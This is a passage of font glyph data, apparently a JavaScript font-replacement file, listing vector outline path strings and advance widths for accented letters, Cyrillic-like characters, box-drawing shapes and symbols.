":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112xm49,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm127,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":223},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm58,-226r0,-39r101,0r0,39r-101,0"},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm55,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm133,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":237},{"d":"7,0r0,-203r203,0r0,203r-203,0xm108,-24v41,0,78,-36,78,-77v0,-41,-37,-78,-78,-78v-41,0,-77,36,-77,78v0,42,36,77,77,77xm108,-166v34,0,64,30,64,65v0,34,-30,64,-64,64v-34,0,-64,-30,-64,-64v0,-34,30,-65,64,-65"},{"d":"227,-259r49,0r0,259r-49,0r0,-259xm191,-79v0,53,-32,79,-89,79r-73,0r0,-259r50,0r0,98v68,-4,112,21,112,82xm79,-47v37,0,63,1,63,-33v0,-27,-25,-39,-63,-37r0,70","w":304},{"d":"82,-180v0,46,-1,66,38,69r0,42v-34,4,-41,22,-39,63v3,70,-17,86,-81,85r0,-42v27,-1,35,0,36,-25v0,-43,0,-88,33,-102v-32,-21,-32,-35,-33,-96v0,-29,-6,-30,-36,-30r0,-43v61,-1,82,15,82,79","w":122},{"d":"69,-59v3,30,43,25,64,5r22,37v-39,38,-142,28,-140,-37v0,-23,12,-39,36,-48v-53,-26,-21,-94,38,-94v20,0,38,7,55,20r-19,33v-21,-16,-48,-17,-52,8v-2,16,15,21,34,20r0,34v-21,-2,-40,3,-38,22xm103,-288r-7,67r-35,0r-7,-67r49,0","w":157},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm189,-245v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17","w":230},{"d":"245,7v-67,0,-131,-52,-133,-120r-34,0r0,113r-49,0r0,-259r49,0r0,98r34,0v24,-65,62,-101,133,-104v71,-3,134,63,134,137v0,74,-62,136,-134,135xm245,-41v46,0,84,-41,84,-88v0,-46,-38,-89,-85,-88v-46,1,-84,40,-84,89v0,50,39,87,85,87","w":395},{"d":"103,-39v61,0,37,-92,42,-152r48,0r0,191r-48,0r0,-20v-21,22,-52,32,-74,12r0,78r-48,0r0,-261r48,0v7,55,-22,152,32,152"},{"d":"21,-130v1,-65,68,-64,142,-61r0,191r-48,0r0,-69r-9,0r-46,69r-56,0r53,-78v-19,-6,-37,-27,-36,-52xm115,-105r0,-46v-23,-2,-44,2,-44,23v0,19,20,25,44,23","w":187},{"d":"29,-194v0,-81,79,-74,157,-72r0,20r-15,0r0,313r-24,0r0,-313r-26,0r0,313r-24,0r0,-192v-43,0,-68,-26,-68,-69"},{"d":"171,-61v3,72,-76,61,-147,61r0,-191r48,0r0,69v60,-4,98,8,99,61xm72,-37v25,1,48,1,48,-22v0,-24,-23,-25,-48,-24r0,46xm204,-191r48,0r0,191r-48,0r0,-191","w":276},{"d":"16,-191r147,0r-86,150r81,0r0,41r-155,0r86,-151r-73,0r0,-40","w":165},{"d":"94,-59v0,-17,-17,-24,-38,-22r0,-34v36,9,45,-38,12,-40v-8,0,-18,4,-30,12r-19,-33v38,-35,121,-24,120,33v0,17,-9,31,-27,41v67,25,31,107,-39,107v-26,0,-48,-7,-65,-22r27,-33v19,17,59,18,59,-9","w":162},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm124,-295r57,0r-65,69r-34,0","w":230},{"d":"26,-166r166,0r0,166r-166,0r0,-166","w":217},{"d":"146,-328r31,0r0,268r-180,0r0,-31r149,0r0,-237xm79,-158r0,-170r31,0r0,201r-113,0r0,-31r82,0","w":256},{"d":"19,-265r48,0r0,265r-48,0r0,-265xm84,-265r45,0v2,45,-4,73,-25,99r-18,-14v9,-12,12,-18,16,-35r-18,0r0,-50","w":113},{"d":"16,-98v-8,-82,97,-130,150,-72r0,-21r47,0r0,164v19,122,-169,134,-197,41r53,0v17,23,81,21,92,-5v3,-6,5,-18,5,-33v-52,56,-158,5,-150,-74xm168,-98v0,-30,-23,-53,-52,-53v-29,0,-52,23,-52,53v0,31,23,55,53,55v30,1,51,-24,51,-55","w":237},{"d":"84,-295r57,0r-65,69r-34,0","w":151},{"d":"0,-187r198,0r0,36r-30,0r0,151r-51,0r0,-151r-36,0r0,151r-52,0r0,-151r-29,0r0,-36","w":197},{"d":"29,-259r88,0r0,-37r47,0r0,86r-86,0r0,210r-49,0r0,-259","w":172},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm124,-347r42,69r-34,0r-65,-69r57,0","w":266},{"d":"114,-152v-60,0,-38,90,-42,152r-48,0r0,-265r48,0r0,93v38,-42,122,-26,122,46r0,126r-47,0v-6,-56,20,-152,-33,-152"},{"d":"260,-127r-263,0r0,-31r263,0r0,31xm260,-60r-263,0r0,-31r263,0r0,31","w":256},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm51,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm129,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":230},{"d":"100,-288r-7,67r-35,0r-7,-67r49,0","w":151},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137","w":280},{"d":"8,46r116,-312r34,0r-116,312r-34,0","w":165},{"d":"24,0r0,-191r48,0r0,145r72,0r0,-145r48,0r0,191r-62,0r0,34r-45,0r0,-34r-61,0"},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100","w":230},{"d":"-3,109r0,-437r131,0r0,437r-131,0","w":256},{"d":"18,-131v-7,-125,176,-181,250,-85r-34,34v-52,-65,-167,-33,-167,52v0,83,131,127,164,45r-75,0r0,-46r130,0v3,80,-48,138,-128,138v-84,0,-135,-56,-140,-138","w":302},{"d":"32,-162v-43,-57,29,-130,95,-94v12,6,24,17,38,33r-36,32v-13,-18,-26,-27,-39,-27v-11,0,-22,7,-22,17v17,48,102,68,102,134v0,62,-77,95,-128,60v-14,-9,-25,-24,-35,-43r42,-25v12,23,26,35,42,35v22,1,40,-23,24,-42v-15,-19,-78,-66,-83,-80","w":187},{"d":"113,-152v-60,0,-36,92,-41,152r-48,0r0,-215r-27,0r0,-31r27,0r0,-19r48,0r0,19r61,0r0,31r-61,0r0,43v43,-45,122,-24,122,46r0,126r-47,0v-7,-56,22,-152,-34,-152"},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm67,-265r-7,67r-35,0r-7,-67r49,0","w":266},{"d":"99,-227v-16,-4,-31,-7,-32,12r-1,24r31,0r0,41r-31,0r0,150r-48,0r0,-150r-17,0r0,-41r17,0v-9,-73,26,-89,81,-72r0,36","w":100},{"d":"144,-94r-147,0r0,-31r116,0r0,-203r31,0r0,234","w":256},{"d":"35,-262r47,0r0,133r-33,0r0,-105r-34,0","w":120},{"d":"328,-79v0,53,-32,79,-89,79r-73,0r0,-114r-87,0r0,114r-50,0r0,-259r50,0r0,98r87,0r0,-98r50,0r0,98v68,-4,112,25,112,82xm216,-47v36,0,63,0,63,-32v0,-29,-27,-38,-63,-35r0,67","w":341},{"d":"87,-259r41,0r69,195r-43,0r-46,-132r-46,132r-43,0"},{"d":"113,-60r-116,0r0,-31r116,0r0,-36r-116,0r0,-31r116,0r0,-170r31,0r0,170r116,0r0,31r-116,0r0,36r116,0r0,31r-116,0r0,169r-31,0r0,-169","w":256},{"d":"79,-73r40,0r0,29r-40,0r0,44r-49,0r0,-44r-30,0r0,-29r30,0r0,-186r129,0r0,48r-80,0r0,47r80,0r0,48r-80,0r0,43","w":172},{"d":"113,-94r-116,0r0,-31r263,0r0,31r-116,0r0,203r-31,0r0,-203","w":256},{"d":"27,0r0,-111r81,-92r81,92r0,111r-162,0xm41,-14r134,0r0,-91r-67,-76r-67,76r0,91"},{"d":"91,-216v23,38,50,74,81,110v-16,15,-70,86,-81,110v-12,-22,-38,-59,-80,-110v38,-45,64,-81,80,-110","w":182},{"d":"29,-259r187,0r0,259r-50,0r0,-213r-87,0r0,213r-50,0r0,-259","w":244},{"d":"130,-287v-12,2,-9,10,-9,31r0,347r-26,0r0,-319v-1,-40,18,-74,52,-77v26,-2,32,33,8,35v-14,1,-15,-15,-25,-17"},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259","w":187},{"d":"72,-265v33,0,61,28,61,60v0,33,-28,61,-61,61v-33,0,-61,-28,-61,-61v0,-33,28,-60,61,-60xm72,-164v21,0,40,-19,40,-40v0,-22,-18,-41,-39,-41v-21,-1,-41,19,-41,40v0,21,19,41,40,41","w":143},{"d":"72,-122r72,0r0,-69r48,0r0,191r-48,0r0,-79r-72,0r0,79r-48,0r0,-191r48,0r0,69"},{"d":"160,-23v36,61,-25,122,-100,92r10,-42v15,7,57,10,54,-10v-3,-24,-56,-20,-67,-32v-26,-13,-44,-40,-44,-79v0,-64,40,-84,88,-126r-72,0r0,-45r138,0r0,40v-53,42,-97,65,-106,130v-7,56,82,44,99,72","w":171},{"d":"210,-95v0,98,-140,135,-195,60r38,-26v26,34,93,31,106,-15r-64,0r0,-41r64,0v-18,-41,-74,-46,-106,-14r-40,-22v55,-79,197,-42,197,58","w":224},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm159,38v1,-25,22,-42,57,-38v-16,10,-25,19,-25,29v0,17,19,20,34,12r0,28v-32,7,-68,-2,-66,-31","w":237},{"d":"16,-239v-1,-16,15,-31,31,-31v17,0,31,14,31,31v0,17,-15,31,-31,31v-17,0,-31,-14,-31,-31xm-15,30v20,10,38,6,38,-20r0,-201r48,0r0,197v5,59,-35,82,-86,62r0,-38","w":93},{"d":"72,-172v45,-45,126,-24,122,46v-5,87,31,238,-86,194r0,-38v19,10,41,7,38,-20v-7,-57,23,-162,-32,-162v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19"},{"d":"22,-180v0,-81,72,-82,160,-79r0,259r-49,0r0,-104r-13,0r-52,104r-53,0r58,-112v-34,-10,-51,-32,-51,-68xm74,-181v-1,30,28,29,59,29r0,-58v-33,-1,-59,-1,-59,29","w":211},{"d":"24,-191r48,0r0,71r66,-71r59,0r-85,93r86,98r-64,0r-57,-68v-11,13,-2,46,-5,68r-48,0r0,-191xm125,-295r57,0r-65,69r-34,0","w":193},{"d":"191,-75v0,49,-33,76,-89,75r-72,0r0,-259v75,-2,142,1,142,67v0,24,-10,38,-26,50v28,12,45,32,45,67xm125,-185v1,-23,-20,-29,-46,-27r0,55v26,1,46,-5,46,-28xm143,-77v0,-30,-27,-38,-64,-36r0,66v35,0,64,-1,64,-30","w":208},{"d":"144,-60r-147,0r0,-31r116,0r0,-36r-116,0r0,-31r116,0r0,-170r31,0r0,268","w":256},{"d":"48,-15v-65,-61,-29,-200,79,-180r17,-38r28,12r-17,37v13,8,23,17,30,28r-39,24v-3,-4,-7,-8,-10,-11r-44,102v23,7,42,1,57,-14r31,30v-22,25,-64,38,-106,25r-20,43r-27,-12xm109,-153v-42,0,-57,52,-40,90","w":201},{"d":"177,-158r83,0r0,31r-114,0r0,-201r31,0r0,170xm79,-158r0,-170r31,0r0,201r-113,0r0,-31r82,0xm79,-60r-82,0r0,-31r113,0r0,200r-31,0r0,-169xm177,-60r0,169r-31,0r0,-200r114,0r0,31r-83,0","w":256},{"d":"32,-162v-43,-57,29,-130,95,-94v12,6,24,17,38,33r-36,32v-13,-18,-26,-27,-39,-27v-11,0,-22,7,-22,17v17,48,102,68,102,134v0,62,-77,95,-128,60v-14,-9,-25,-24,-35,-43r42,-25v12,23,26,35,42,35v22,1,40,-23,24,-42v-15,-19,-78,-66,-83,-80xm16,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":187},{"d":"6,-187r183,0r0,36r-66,0r0,151r-51,0r0,-151r-66,0r0,-36","w":195},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm225,-297v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17","w":302},{"d":"20,-226r176,0r0,44r-176,0r0,-44xm20,-151r176,0r0,44r-176,0r0,-44xm20,-76r176,0r0,44r-176,0r0,-44"},{"d":"222,-95v7,79,-97,133,-150,75r0,90r-48,0r0,-261r48,0r0,21v52,-59,160,-8,150,75xm174,-96v0,-32,-22,-56,-52,-56v-30,1,-52,24,-52,56v0,32,22,56,52,57v30,1,52,-26,52,-57","w":237},{"d":"54,-131v0,-28,26,-54,54,-54v28,0,54,26,54,54v0,28,-26,54,-54,54v-28,0,-54,-26,-54,-54"},{"d":"221,-81v3,46,75,58,101,25r40,19v-21,41,-103,57,-144,23r0,14r-44,0r0,-24v-49,63,-167,13,-158,-71v-8,-81,108,-138,158,-71r0,-25r44,0r0,14v68,-48,168,2,157,96r-154,0xm327,-119v-8,-46,-95,-48,-104,0r104,0xm175,-97v0,-31,-23,-56,-55,-56v-31,0,-55,25,-55,58v0,31,23,56,55,56v34,0,55,-25,55,-58","w":388},{"d":"32,-162v-43,-57,29,-130,95,-94v12,6,24,17,38,33r-36,32v-13,-18,-26,-27,-39,-27v-11,0,-22,7,-22,17v17,48,102,68,102,134v0,62,-77,95,-128,60v-14,-9,-25,-24,-35,-43r42,-25v12,23,26,35,42,35v22,1,40,-23,24,-42v-15,-19,-78,-66,-83,-80xm89,-347r57,0r-65,69r-34,0","w":187},{"d":"177,-94r-180,0r0,-31r82,0r0,-203r31,0r0,203r36,0r0,-203r31,0r0,234","w":256},{"d":"30,-259r50,0r0,89r70,-89r59,0r-90,116r99,143r-59,0r-79,-115r0,115r-50,0r0,-259","w":223},{"d":"74,-166r-45,0v-2,-45,4,-74,25,-99r18,13v-8,12,-12,19,-16,35r18,0r0,51","w":100},{"d":"77,-190r0,-66r44,0r0,66r66,0r0,44r-66,0r0,66r-44,0r0,-66r-66,0r0,-44r66,0xm11,-44r176,0r0,44r-176,0r0,-44","w":197},{"d":"349,-95v0,76,-84,132,-144,79r0,86r-47,0r0,-86v-60,54,-144,-2,-144,-79v0,-79,87,-132,144,-78r0,-92r47,0r0,92v56,-53,144,-5,144,78xm252,-39v28,0,49,-26,49,-57v0,-31,-20,-56,-50,-56v-28,0,-47,25,-47,58v0,31,19,55,48,55xm111,-38v29,-1,49,-24,48,-56v0,-34,-16,-55,-47,-57v-30,-2,-50,26,-50,56v0,30,20,58,49,57","w":362},{"d":"133,-267v78,0,135,56,135,134v0,78,-57,134,-135,134v-77,0,-134,-57,-134,-134v0,-77,57,-134,134,-134xm133,-27v61,0,106,-43,107,-106v2,-58,-49,-108,-107,-106v-62,2,-107,45,-107,106v0,62,46,106,107,106xm93,-136v-8,51,67,79,79,28r31,0v-3,29,-31,54,-64,53v-44,0,-76,-35,-76,-80v0,-82,125,-111,140,-26r-31,0v-16,-50,-83,-24,-79,25","w":266},{"d":"12,-239v-1,-16,15,-31,31,-31v16,0,31,14,31,31v0,17,-15,31,-31,31v-17,0,-30,-15,-31,-31xm19,-191r48,0r0,191r-48,0r0,-191","w":86},{"d":"3,-191r47,0r38,109r42,-109r29,0r40,107r39,-107r47,0r-70,191r-30,0r-41,-109r-42,109r-30,0xm80,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm158,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":287},{"d":"153,-79v-1,-29,-21,-44,-51,-45r0,-43v44,7,52,-58,10,-59v-32,6,-40,25,-40,69r0,157r-48,0r0,-157v-2,-74,27,-109,90,-113v41,-2,76,28,75,66v-1,35,-21,52,-54,58v39,7,65,31,66,74v1,56,-53,91,-108,71r0,-45v27,17,61,-3,60,-33"},{"d":"152,-265v110,-5,178,146,99,227r45,58r-58,0r-23,-29v-91,50,-202,-24,-198,-120v3,-79,56,-133,135,-136xm66,-128v0,59,61,105,119,80r-46,-60r58,0r24,30v40,-57,-4,-139,-69,-139v-49,0,-86,40,-86,89","w":302},{"w":284},{"d":"27,-169v18,-64,87,-111,168,-91r-11,47v-47,-17,-89,12,-105,44r95,0r-7,29r-96,0v-1,10,-1,12,0,22r91,0r-7,29r-76,0v15,38,68,60,116,41r0,50v-80,20,-153,-26,-168,-91r-25,0r7,-29r13,0r0,-22r-20,0r7,-29r18,0","w":201},{"d":"118,5v-130,0,-140,-243,-24,-264v20,-4,86,-7,113,-10r0,45v-71,7,-151,-9,-150,78v32,-90,163,-44,163,48v0,57,-44,103,-102,103xm119,-40v31,0,52,-24,52,-56v0,-32,-22,-55,-52,-55v-29,-1,-52,25,-52,55v0,33,21,56,52,56","w":234},{"d":"294,-88v0,81,-98,126,-140,65v-43,61,-140,15,-140,-65v0,-66,47,-107,112,-109r3,46v-45,6,-67,26,-67,63v0,33,13,50,38,50v28,0,33,-36,31,-72r47,0v-2,36,3,72,31,72v25,0,37,-17,37,-50v0,-44,-25,-57,-67,-63r4,-46v65,2,111,44,111,109xm179,-288r-7,67r-35,0r-7,-67r49,0","w":308},{"d":"101,-265v70,-6,101,85,53,125v22,14,37,36,37,67v0,50,-35,80,-90,80v-92,0,-116,-109,-54,-147v-47,-39,-18,-133,54,-125xm129,-189v0,-17,-12,-29,-30,-29v-16,0,-27,12,-27,29v0,15,13,29,28,29v17,0,29,-12,29,-29xm142,-76v0,-22,-19,-38,-41,-38v-22,0,-42,16,-42,37v0,21,20,37,42,37v24,0,40,-14,41,-36","w":201},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,261r-47,0r0,-90v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"3,-191r47,0r38,109r42,-109r29,0r40,107r39,-107r47,0r-70,191r-30,0r-41,-109r-42,109r-30,0","w":287},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm192,-245v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17","w":237},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100xm130,-295r57,0r-65,69r-34,0","w":230},{"d":"16,-141v-2,-61,97,-72,125,-24r-29,30v-12,-12,-23,-18,-33,-18v-11,-1,-22,9,-15,19v30,21,81,31,81,79v0,68,-105,79,-136,27r30,-32v10,18,53,35,61,7v3,-11,-24,-24,-37,-30v-31,-16,-47,-35,-47,-58","w":158},{"d":"8,-147v0,-58,34,-80,101,-78r0,-34r50,0r0,34v66,-3,106,22,104,77v-2,60,-37,80,-104,78r0,70r-50,0r0,-70v-62,1,-101,-20,-101,-77xm55,-147v0,31,23,34,54,33r0,-66v-32,-1,-54,3,-54,33xm216,-147v0,-30,-24,-34,-57,-33r0,66v34,2,57,-3,57,-33","w":271},{"d":"8,-202v0,-33,25,-63,56,-63v33,-1,58,29,58,63v0,34,-25,62,-58,62v-31,0,-56,-29,-56,-62xm65,-171v28,0,28,-62,0,-62v-29,0,-29,62,0,62","w":129},{"d":"139,-146r-40,0r0,146r-48,0r0,-146r-40,0r0,-45r128,0r0,45","w":149},{"d":"29,-259r50,0r0,98r87,0r0,-98r50,0r0,259r-50,0r0,-113r-87,0r0,113r-50,0r0,-259","w":244},{"d":"3,-191r47,0r38,109r42,-109r29,0r40,107r39,-107r47,0r-70,191r-30,0r-41,-109r-42,109r-30,0xm72,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":287},{"d":"30,-259r49,0r0,212r71,0r0,47r-120,0r0,-259xm102,-265r45,0v2,45,-4,73,-25,99r-18,-14v9,-12,12,-18,16,-35r-18,0r0,-50","w":158},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56","w":230},{"d":"74,-265r-45,0v-2,45,4,73,25,99r18,-14v-9,-12,-12,-18,-16,-35r18,0r0,-50","w":100},{"d":"78,-265r47,0r-9,96r80,-8r0,47r-80,-9r9,209r-47,0r8,-209r-79,9r0,-47r79,8","w":201},{"d":"189,-255r-5,42v-24,-19,-42,-13,-43,23r-4,26r39,0r-6,41r-39,0v-10,55,-11,124,-29,171v-12,32,-61,34,-89,11r6,-42v22,19,40,18,45,-16r19,-124r-40,0r6,-41r40,0v4,-57,13,-122,78,-103v6,2,13,6,22,12","w":201},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm35,-295r42,69r-34,0r-65,-69r57,0","w":86},{"d":"28,-265r240,0r0,335r-34,0r0,-304r-172,0r0,304r-34,0r0,-335","w":296},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56","w":230},{"d":"117,-196v38,2,60,13,78,37v39,-58,145,-41,168,15v7,16,12,37,12,63r-155,0v3,44,69,59,100,27r41,18v-30,50,-131,56,-166,4v-18,22,-41,36,-78,37v-56,1,-103,-46,-103,-101v0,-53,48,-102,103,-100xm327,-119v-9,-48,-96,-46,-106,0r106,0xm171,-96v0,-30,-24,-57,-54,-57v-33,1,-55,25,-55,58v0,33,20,57,54,57v33,1,55,-26,55,-58","w":388},{"d":"15,-95v0,-83,98,-134,151,-75r0,-95r47,0r0,265r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm107,-347r42,69r-34,0r-65,-69r57,0","w":230},{"d":"23,-169v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28xm23,-23v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28","w":100},{"d":"63,-259v2,51,-13,107,50,98r30,0r0,-98r49,0r0,259r-49,0r0,-113v-83,3,-132,-14,-130,-94r0,-52r50,0","w":221},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm87,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm165,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":302},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm207,-297v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17","w":266},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm107,-295r42,69r-34,0r-65,-69r57,0","w":230},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm-14,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm64,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":100},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm28,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":187},{"d":"260,-127r-263,0r0,-31r116,0r0,-170r31,0r0,170r116,0r0,31xm260,-60r-263,0r0,-31r263,0r0,31","w":256},{"d":"30,-259r49,0r0,212r71,0r0,47r-120,0r0,-259xm80,-347r57,0r-65,69r-34,0","w":158},{"d":"191,-75v0,49,-33,76,-89,75r-72,0r0,-259v75,-2,142,1,142,67v0,24,-10,38,-26,50v28,12,45,32,45,67xm125,-185v1,-23,-20,-29,-46,-27r0,55v26,1,46,-5,46,-28xm143,-77v0,-30,-27,-38,-64,-36r0,66v35,0,64,-1,64,-30","w":208},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88","w":302},{"d":"15,-95v0,-83,98,-134,151,-75r0,-46r-75,0r0,-29r75,0r0,-20r47,0r0,20r24,0r0,29r-24,0r0,216r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"183,-184v-3,56,-35,77,-104,74r0,110r-50,0r0,-259v82,-3,158,-1,154,75xm135,-184v0,-26,-26,-26,-56,-26r0,52v30,1,56,2,56,-26","w":201},{"d":"16,-93v0,-86,99,-132,157,-75v18,17,28,42,29,75r-146,0r0,65v37,35,99,25,122,-22r13,7v-23,32,-40,48,-82,49v-55,2,-93,-44,-93,-99xm161,-106r0,-53v-28,-28,-79,-28,-105,1r0,52r105,0"},{"d":"70,-233r57,0r0,56r-57,0r0,-56xm11,-151r176,0r0,44r-176,0r0,-44xm70,-82r57,0r0,57r-57,0r0,-57","w":197},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm47,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":237},{"d":"50,0r-45,0r32,-96r-32,-95r45,0r32,95","w":86},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84xm75,-276v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":208},{"d":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112","w":223},{"d":"216,0r-211,0r110,-244xm174,-14r-70,-170r-77,170r147,0","w":220},{"d":"31,-118r89,0r0,45r-89,0r0,-45","w":151},{"d":"126,-193v2,-35,-53,-29,-58,-2r-47,0v4,-41,38,-70,80,-70v40,0,75,30,75,68v0,27,-16,45,-37,55v93,27,43,153,-41,149v-51,-2,-85,-35,-87,-85r48,0v4,23,16,40,42,39v21,0,41,-17,40,-38v-2,-27,-27,-43,-60,-42r0,-42v26,-2,43,-10,45,-32","w":201},{"d":"187,-100r0,44r-176,-89r0,-39r176,-90r0,44r-126,65xm11,-36r176,0r0,44r-176,0r0,-44","w":197},{"d":"73,-166r-44,0v-2,-45,3,-74,25,-99r17,13v-8,12,-12,19,-16,35r18,0r0,51xm145,-166r-45,0v-2,-45,4,-74,25,-99r18,13v-8,12,-12,19,-16,35r18,0r0,51","w":172},{"d":"67,-295r42,69r-34,0r-65,-69r57,0","w":151},{"d":"115,-176r-28,0r-9,-89r47,0xm43,-176r-28,0r-10,-89r47,0","w":1